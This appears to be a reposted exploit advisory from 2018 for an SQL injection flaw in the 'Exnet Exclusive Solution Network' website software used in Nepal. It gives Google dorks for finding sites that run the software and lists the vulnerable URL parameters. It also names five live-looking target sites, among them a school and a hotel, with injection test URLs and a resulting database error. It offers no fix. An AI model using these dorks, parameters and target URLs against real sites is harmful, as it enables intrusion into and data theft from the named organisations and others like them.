facebook facebook twitter rss

Powered By Exnet Exclusive Solution Network Nepal SQL Injection Vulnerability

Author: KingSkrupellos , Published: 10-10-2018
# Exploit Title : Powered By Exnet Exclusive Solution Network Nepal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 12/09/2018
# Vendor Homepage : exnet.com.np
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090109

#################################################################################################

# Google Dork :

intext:''Powered by: Exclusive Solution Network''

intext:''Powered by Exnet Exclusive Solution Network''

# Exploit :

/s.php?exsn=[SQL Injection]

/sm_detail.php?exsubsn=[SQL Injection]

/s.php?exsn=[ID-NUMBER]&exmenusn=[ID-NUMBER]&exsubsn=[SQL Injection]

#################################################################################################

# Example Sites =>

nmt.edu.np/s.php?exsn=11%27

woscc.org.np/s.php?exsn=20&exmenusn=13&exsubsn=17%27

hicodef.org.np/s.php?exsn=19&exmenusn=1&exsubsn=14%27

hotelprakash.com.np/s.php?exsn=8&exmenusn=3&exsubsn=1%27

easytechtravels.com.np/s.php?exsn=52&exmenusn=3&exsubsn=5%27

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your
MariaDB server version for the right syntax to use near 'order by exmenusn' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :